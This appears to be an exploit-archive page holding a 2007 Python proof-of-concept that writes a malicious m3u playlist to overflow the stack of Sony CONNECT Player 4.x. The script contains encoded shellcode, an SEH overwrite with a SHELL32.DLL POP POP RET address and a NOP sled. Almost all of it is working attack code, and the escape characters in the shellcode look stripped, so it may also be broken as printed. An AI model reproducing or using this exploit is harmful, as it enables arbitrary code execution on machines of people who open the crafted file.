[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Sony CONNECT Player 4.x (m3u File) Local Stack Overflow Exploit
# Published : 2007-10-29
# Author : TaMBaRuS
# Previous Title : Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit
# Next Title : Kodak Image Viewer TIF/TIFF Code Execution Exploit PoC (MS07-055)
#!/usr/bin/python
#Secunia Advisory : SA27270
#Release Date : 2007-10-29
# Sony CONNECT Player M3U Playlist Processing Stack Buffer Overflow (m3u File) Local Exploit
# Bug discovered by Parvez Anwar
# Exploit Written by TaMBaRuS (tambarus@gmail.com)
# Tested on: Sony CONNECT Player (SonicStage) 4.x installed on Windows XP SP2/ 2k SP4
# Shellcode: Windows Execute Command <metasploit.com>
# Eductional Purposes only ;)
##
from struct import pack
m3u = ("#EXTM3Unhttp://%s")
shellcode = (
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x44"
"x42x30x42x50x42x50x4bx58x45x44x4ex33x4bx48x4ex57"
"x45x50x4ax57x41x30x4fx4ex4bx38x4fx34x4ax31x4bx58"
"x4fx35x42x32x41x50x4bx4ex49x54x4bx38x46x43x4bx58"
"x41x50x50x4ex41x53x42x4cx49x49x4ex4ax46x58x42x4c"
"x46x57x47x50x41x4cx4cx4cx4dx30x41x30x44x4cx4bx4e"
"x46x4fx4bx53x46x35x46x42x46x30x45x57x45x4ex4bx38"
"x4fx45x46x52x41x50x4bx4ex48x56x4bx48x4ex50x4bx54"
"x4bx48x4fx45x4ex51x41x30x4bx4ex4bx58x4ex51x4bx48"
"x41x50x4bx4ex49x58x4ex55x46x52x46x50x43x4cx41x53"
"x42x4cx46x56x4bx38x42x34x42x33x45x38x42x4cx4ax47"
"x4ex50x4bx38x42x44x4ex50x4bx38x42x47x4ex41x4dx4a"
"x4bx48x4ax56x4ax30x4bx4ex49x30x4bx48x42x48x42x4b"
"x42x50x42x30x42x50x4bx38x4ax36x4ex43x4fx35x41x43"
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"
"x42x35x4ax56x42x4fx4cx48x46x50x4fx45x4ax56x4ax49"
"x50x4fx4cx38x50x30x47x55x4fx4fx47x4ex43x46x41x36")
NEXT_SEH_RECORD = 0x909006EB # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA53D2 # POP POP RET (SHELL32.DLL/2k SP4)
buf = "PLAY ME"
buf += "x3e" * 1062
buf += pack("<L", NEXT_SEH_RECORD)
buf += pack("<L", SE_HANDLER)
buf += "x90" * 90
buf += shellcode
m3u %= buf
fd = open("playme.m3u", "w")
fd.write(m3u)
fd.close()
print "DONE"
# EoF
# www.Syue.com [2007-10-29]